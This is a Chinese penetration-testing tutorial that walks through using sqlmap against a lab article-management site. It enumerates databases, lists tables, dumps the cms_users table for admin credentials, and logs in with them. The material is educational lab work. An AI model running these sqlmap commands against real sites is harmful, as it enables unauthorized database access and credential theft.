渗透测试-sqlMap工具

利用SqlMap工具攻击网站,进入数据库(MySQL),获取管理员账号和密码,登录网站。kali系统有SqlMap工具,所以用kali系统作为攻击机,靶机是一个文章管理系统的网站服务器。(所用环境来源于360)

靶机ip:172.23.188.13

第一步:在kali系统浏览器访问web服务器

命令:

http://172.23.188.13:8083/show.php?id=3

172.23.188.13:靶机ip 8083 是端口

渗透测试-sqlMap工具_第1张图片

第二步:在kali系统终端上,进行sql注入,获取数据库信息

命令:

sqlmap -u http://172.23.188.13:8083/show.php?id=3

 渗透测试-sqlMap工具_第2张图片

在执行过程中,会询问配置选择时,都默认输入yes或y,如下图
 
在选择完默认配置之后,会显示出web服务的信息,如下图

渗透测试-sqlMap工具_第3张图片
 
第三步:获取web服务器上的数据库信息

命令:

sqlmap -u http://172.23.188.13:8083/show.php?id=3 --dbs

--dbs 是查看所有数据库

 渗透测试-sqlMap工具_第4张图片

执行完命令之后获得数据库信息如下
 渗透测试-sqlMap工具_第5张图片
第4步:进入查看数据库cms中的表

命令:

sqlmap -u http://172.23.188.13:8083/show.php?id=3 -D cms --tables

-D 是查看某个数据库, cms是数据库名,用来查看cms数据库
--tables 查看数据库中所有的表

 渗透测试-sqlMap工具_第6张图片


命令执行完之后,结果如下。cms_users应该是存放用户帐号和密码的表
 渗透测试-sqlMap工具_第7张图片
第5步:进入cms数据库中的cms_users表,查看所有的字段
 命令:

sqlmap -u http://172.23.188.13:8083/show.php?id=3 -D cms -T cms_users --columns

-T 是查看某个数据表, cms_users是表名,用来查看cms_users表
--columns 查看的表中的所有字段

渗透测试-sqlMap工具_第8张图片
执行完命令得到结果

 渗透测试-sqlMap工具_第9张图片

第6步:进入cms数据库中的cms_users表,查看所有的字段,及字段的内容

命令:

sqlmap -u http://172.23.188.13:8083/show.php?id=3 -D cms -T cms_users --columns --dump

-T 是查看某个数据表, cms_users是表名,用来查看cms_users表
--columns 查看的表中的所有字段
--dump 查看所有字段的内容

渗透测试-sqlMap工具_第10张图片
 
在执行过程中,会询问4次配置选择,选择如下
 渗透测试-sqlMap工具_第11张图片
得到结果如下:

 渗透测试-sqlMap工具_第12张图片

第7步:用帐号密码登录网站
               渗透测试-sqlMap工具_第13张图片
结果登录成功,如下图
 渗透测试-sqlMap工具_第14张图片

你可能感兴趣的:(web,攻击与防护,linux,数据库,测试工具)